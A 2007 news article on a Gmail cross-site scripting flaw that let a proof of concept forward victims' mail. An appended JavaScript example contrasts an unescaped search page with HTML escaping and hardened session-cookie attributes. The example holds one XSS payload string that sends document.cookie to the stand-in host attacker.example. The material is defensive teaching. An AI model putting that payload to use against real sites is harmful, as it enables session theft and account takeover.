Users' privacy exposed by Gmail cookie vulnerability
Published September 28th, 2007 in Security
Ethical hacking group GNUCitizen has developed a proof-of-concept program that steals contacts and incoming e-mail from Google Gmail users. The proof of concept forwards all of a victim's incoming e-mail to the attacker, demonstrating how the vulnerability could be put to malicious use.
An attacker can compromise a Gmail account through a cross-site scripting vulnerability if the victim is logged in and clicks a malicious link. Because the victim's browser carries the Gmail session cookies, the attacker can act as the account owner and forward all of the account's messages to a POP account under the attacker's control. The problem is compounded by Google's policy of keeping those cookies valid for two years, so a stolen session stays usable long after the click. The obvious risk is to home users, but many organizations could be exposed as well, since they do not filter e-mail that employees forward from work to personal accounts.
One work-around is to use Gmail through Firefox with JavaScript disabled. This limits access to many features of popular Web sites, but it protects against this threat. Developers at many large enterprises are not aware of the power of cross-site scripting; they are advised to consult resources such as the Open Web Application Security Project (OWASP), which offers free tools and guidance for writing secure code and testing for XSS vulnerabilities.
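The two points above, a reflected script stealing a session cookie and the developer-side fixes OWASP guidance covers, are shown in the added example below. It is not GNUCitizen's proof of concept and not Google's code: the search page, the cookie name SESSION and the host attacker.example are hypothetical, chosen to show how unescaped output lets a link-borne payload read document.cookie, and how output encoding plus HttpOnly, Secure and a bounded Max-Age blunt the attack.

```javascript
// Added example, not the article's or GNUCitizen's code. The page, cookie
// name and attacker host are hypothetical.

// Payload of the kind a malicious link can carry in its query string. If
// the page echoes it unescaped, the browser runs the onerror handler and
// sends document.cookie to the attacker's host.
const XSS_PAYLOAD =
  '<img src=x onerror="(new Image).src=\'https://attacker.example/c?\'' +
  '+encodeURIComponent(document.cookie)">';

// Minimal HTML escaping for text nodes and double-quoted attribute values.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// A search page that reflects the query back to the user. The vulnerable
// form interpolates raw input into HTML; the hardened form escapes it.
function renderSearchPage(query, hardened) {
  const shown = hardened ? escapeHtml(query) : query;
  return `<html><body><h1>Results for: ${shown}</h1></body></html>`;
}

// Does the rendered page still contain an executable <img onerror=...> tag?
function payloadSurvives(html) {
  return /<img[^>]+onerror=/i.test(html);
}

// Session cookie attributes. HttpOnly keeps document.cookie from exposing
// the value to script, Secure keeps it off plaintext HTTP, and a bounded
// Max-Age (here one hour) replaces the two-year lifetime the article
// criticises, so a stolen cookie stops working soon after it is taken.
function sessionCookie(token, maxAgeSeconds = 3600) {
  return [
    `SESSION=${encodeURIComponent(token)}`,
    'Path=/',
    `Max-Age=${maxAgeSeconds}`,
    'Secure',
    'HttpOnly',
    'SameSite=Lax',
  ].join('; ');
}

// Parse a Set-Cookie value back into its attributes so a reviewer can check
// what a server actually emitted (attribute names lower-cased; flags -> true).
function cookieAttributes(setCookieValue) {
  const parts = setCookieValue.split(';').map((p) => p.trim());
  const attrs = { name: parts[0].split('=')[0] };
  for (const part of parts.slice(1)) {
    const [key, value] = part.split('=');
    attrs[key.toLowerCase()] = value === undefined ? true : value;
  }
  return attrs;
}

// Stand-alone demonstration.
function demo() {
  const vulnerable = renderSearchPage(XSS_PAYLOAD, false);
  const hardened = renderSearchPage(XSS_PAYLOAD, true);
  console.log('vulnerable page runs payload :', payloadSurvives(vulnerable));
  console.log('hardened page runs payload   :', payloadSurvives(hardened));
  console.log('Set-Cookie:', sessionCookie('t0k3n'));
  console.log(cookieAttributes(sessionCookie('t0k3n')));
}
demo();
```

HttpOnly stops a script from reading the cookie, but it does not stop the browser from attaching the cookie to a request the attacker provokes; state-changing actions such as adding a forwarding rule therefore also need a per-request secret that an attacker cannot obtain, which is a separate control from the ones shown here.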